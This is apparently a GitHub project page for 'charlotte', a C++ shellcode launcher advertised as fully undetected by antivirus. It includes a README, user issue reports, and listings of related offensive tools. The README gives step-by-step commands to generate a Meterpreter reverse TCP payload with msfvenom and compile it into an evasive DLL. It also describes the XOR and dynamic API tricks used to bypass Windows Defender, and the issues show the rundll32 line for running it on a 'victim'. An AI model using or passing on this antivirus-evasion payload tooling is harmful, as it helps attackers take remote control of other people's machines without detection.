C++ fully undetected shellcode launcher

Overview

charlotte

c++ fully undetected shellcode launcher ;)

releasing this to celebrate the birth of my newborn

description

13/05/2021:

  1. c++ shellcode launcher, fully undetected 0/26 as of 13th May 2021.
  2. dynamic invoking of win32 api functions
  3. XOR encryption of shellcode and function names
  4. randomised XOR keys and variables per run
  5. on Kali Linux, simply 'apt-get install mingw-w64*' and thats it!

17/05/2021:

  1. random strings length and XOR keys length

antiscan.me

alt_text

usage

git clone the repository, generate your shellcode file with the naming beacon.bin, and run charlotte.py

example:

  1. git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
  2. cd charlotte
  3. msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin
  4. python charlotte.py
  5. profit

tested with msfvenom -p (shown in the .gif POC below) and also cobalt strike raw format payload

alt_text

update v1.1

17/05/21:

apparently Microsoft Windows Defender was able to detect the .DLL binary,

and how did they flag it? by looking for several XOR keys of 16 byte size

changing it to 9 shown in the POC .gif below shows it is now undetected again

cheers!

alt_text

Comments
  • Line 201 & 196

    Line 201 & 196

    ] Initialising charlotte() [] [] Failed to read beacon.bin :( [] [] Missing beacon.bin in pwd? [] [] Generating XOR Keys... [] [] charlotte() failed? :( [] [] Completed - Compiling charlotte.dll [] [] Cross Compile Success! [] [] Removing charlotte.cpp... [] rm: cannot remove 'charlotte.cpp': No such file or directory [] Execute on your Windows x64 victim with: [] Traceback (most recent call last): File "charlotte.py", line 201, in main() File "charlotte.py", line 196, in main print("[] rundll32 charlotte.dll, " + e1 + " []") UnboundLocalError: local variable 'e1' referenced before assignment

    opened by alexp121 2
  • Consistent indentation, exit on critical error, binary read of beacon…

    Consistent indentation, exit on critical error, binary read of beacon…

    Nice work on this, however I had a few issues running charlotte.py that are fixed in this PR.

    Summary of fixes:

    • Used env to find the python3 interpreter to use
    • Removed unused import for base64 module
    • Used consistent indentation to fix Python runtime errors I was experiencing
    • Read beacon file as binary to deal with cases where beacon contains byte values not in strings character set (utf-8 in my case)
    • Updated the xor function to accept both byte and str input
    • Script exists on fatal errors to make troubleshooting clearer
    opened by stephenbradshaw 1
  • key = get_random_string()

    key = get_random_string()

    Hello, thank you for the tool when you change : key = get_random_string() to key = get_random_string(9) or 16 This message appears charlotte() failed? :(

    opened by majid-derkaoui 0
  • `getting flagged`

    `getting flagged`

    hey, it is getting caught by windows defender:

    Screenshot 2021-05-25 060818

    windows version: Microsoft Windows [Version 10.0.18363.1379]

    security intelligence version: 1.339.1178.0

    what i used for shellcode : msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<> LPORT=<> -f raw > testing_charlotte.bin

    opened by ORCA666 0
  • error compiling charlotte.cpp

    error compiling charlotte.cpp

    Hi

    When trying to compile charlotte.cpp , i have the following error :

    x86_64-w64-mingw32-g++ -shared -o charlotte.dll charlotte.cpp -fpermissive charlotte.cpp:34:129: error: ‘__drv_aliasesMem’ has not been declared HANDLE (WINAPI * MqwXBhOA)(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, __drv_aliasesMem LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId); ^~~~~~~~~~~~~~~~ charlotte.cpp:34:153: error: expected ‘,’ or ‘...’ before ‘lpParameter’ HANDLE (WINAPI * MqwXBhOA)(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, __drv_aliasesMem LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId);

    Do you have any idea ?

    Thx for your help

    opened by kfr-ma 0
  • key = get_random_string(...)  _ charlotte() failed? :(

    key = get_random_string(...) _ charlotte() failed? :(

    hi when ı write 16 or 9 into the "key = get_random_string(**..here..), "charlotte() failed? :( " message is coming. when ı leave empty, .dll file is creating.

    thanks

    opened by srdrhzl 0
  • Crashes dll

    Crashes dll

    After running dll file it crashes "Windows host proccess(Rundll32)stopped working! machine architecture 64amd and payload msfvenom x64! Wonderful concept, nice work! It gets detected for now like 5 from 28 but still good work!

    opened by Chomikmarkus 1
Owner
haaaackkkk the planet.
null
HatSploit native powerful payload generation and shellcode injection tool that provides support for common platforms and architectures.

HatVenom HatSploit native powerful payload generation and shellcode injection tool that provides support for common platforms and architectures. Featu

EntySec 100 Dec 23, 2022
Arbitrium is a cross-platform, fully undetectable remote access trojan, to control Android, Windows and Linux and doesn't require any firewall exceptions or port forwarding rules

About: Arbitrium is a cross-platform is a remote access trojan (RAT), Fully UnDetectable (FUD), It allows you to control Android, Windows and Linux an

Ayoub 861 Feb 18, 2021
A kAFL based hypervisor fuzzer which fully supports nested VMs

hAFL2 hAFL2 is a kAFL-based hypervisor fuzzer. It is the first open-source fuzzer which is able to target hypervisors natively (including Hyper-V), as

SafeBreach Labs 115 Dec 7, 2022
Log4Shell RCE Exploit - fully independent exploit does not require any 3rd party binaries.

Log4Shell RCE Exploit fully independent exploit does not require any 3rd party binaries. The exploit spraying the payload to all possible logged HTTP

null 258 Jan 2, 2023
A fully automated, accurate, and extensive scanner for finding vulnerable log4j hosts

log4j-scan A fully automated, accurate, and extensive scanner for finding vulnerable log4j hosts Features Support for lists of URLs. Fuzzing for more

Duc Linh Nguyen 4 Aug 8, 2022
RapiDAST provides a framework for continuous, proactive and fully automated dynamic scanning against web apps/API.

RapiDAST RapiDAST provides a framework for continuous, proactive and fully automated dynamic scanning against web apps/API. Its core engine is OWASP Z

Red Hat Product Security 17 Nov 11, 2022
PyFUD - Fully Undetectable payload generator for metasploit

PyFUD fully Undetectable payload generator for metasploit Usage: pyfud.py --host

null 3 Mar 25, 2022
PyExtractor is a decompiler that can fully decompile exe's compiled with pyinstaller or py2exe

PyExtractor is a decompiler that can fully decompile exe's compiled with pyinstaller or py2exe with additional features such as malware checker/detector! Also checks file(s) for suspicious words, discord webhooks, discord invites, pastebins, ips etc..

Rdimo 56 Jul 31, 2022
Fully undetected auto skillcheck hack for dead by daylight that works decently well

Auto-skillcheck was made by Love ❌ code ✅ ❔ ・How to use Start off by installing python ofc Open cmd in the same directory and type pip install -r requ

Rdimo 10 Aug 13, 2022
Tool To generate Stable Undetected Payload

windowsPayload Tool To generate Stable Undetected Payload Don t Upload to Virus Total :) Follow on Social Media Platforms ScreenShots How to install +

youhacker55 117 Dec 30, 2022
A Python package that scrapes Google News article data while remaining undetected by Google.

A Python package that scrapes Google News article data while remaining undetected by Google. Our scraper can scrape page data up until the last page and never trigger a CAPTCHA (download stats: https://pepy.tech/project/GoogleNewsScraper)

Geminid Systems, Inc 6 Aug 10, 2022
An osu! cheat made in c++ rewritten in python and currently undetected.

megumi-python An osu! cheat made in c++ rewritten in python and currently undetected. Installation Guide Download python 3.9 from https://python.org C

Elaina 2 Nov 18, 2022
A tiktok mass account creator with undetected selenium and email verification, to bot an account

⚠️ STILL UNDER DEVELOPEMENT - v1.1-beta ⚠️ Adding PROXY ROTATION Adding EMAIL VERIFICATION Adding USERNAME COMPILER Tiktok Mass Bot Creator v1.1-beta

xtekky 11 Aug 1, 2022
Shellcode antivirus evasion framework

Schrodinger's Cat Schrodinger'sCat is a Shellcode antivirus evasion framework Technical principle Please visit my blog https://idiotc4t.com/ How to us

idiotc4t 27 Jul 9, 2022
HatSploit native powerful payload generation and shellcode injection tool that provides support for common platforms and architectures.

HatVenom HatSploit native powerful payload generation and shellcode injection tool that provides support for common platforms and architectures. Featu

EntySec 100 Dec 23, 2022
Basic python tools to generate shellcode runner in vba

vba_bin_runner Basic python tools to generate shellcode runner in vba. The stub use ZwAllocateVirtualMemory to allocate memory, RtlMoveMemory to write

null 4 Aug 24, 2021
Shellcode runner to execute malicious payload and bypass AV

buffshark-shellcode-runner Python Shellcode Runner to execute malicious payload and bypass AV This script utilizes mmap(for linux) and win api wrapper

Momo Lenard 9 Dec 29, 2022
Custom 64 bit shellcode encoder that evades detection and removes some common badchars (\x00\x0a\x0d\x20)

x64-shellcode-encoder Custom 64 bit shellcode encoder that evades detection and removes some common badchars (\x00\x0a\x0d\x20) Usage Using a generato

Cole Houston 2 Jan 26, 2022
SysWhispers integrated shellcode loader w/ ETW patching & anti-sandboxing

TymSpecial Shellcode Loader Description This project was made as a way for myself to learn C++ and gain insight into how EDR products work. TymSpecial

Nick Frischkorn 145 Dec 20, 2022
SysWhispers Shellcode Loader

Shhhloader Shhhloader is a SysWhispers Shellcode Loader that is currently a Work in Progress. It takes raw shellcode as input and compiles a C++ stub

icyguider 630 Jan 3, 2023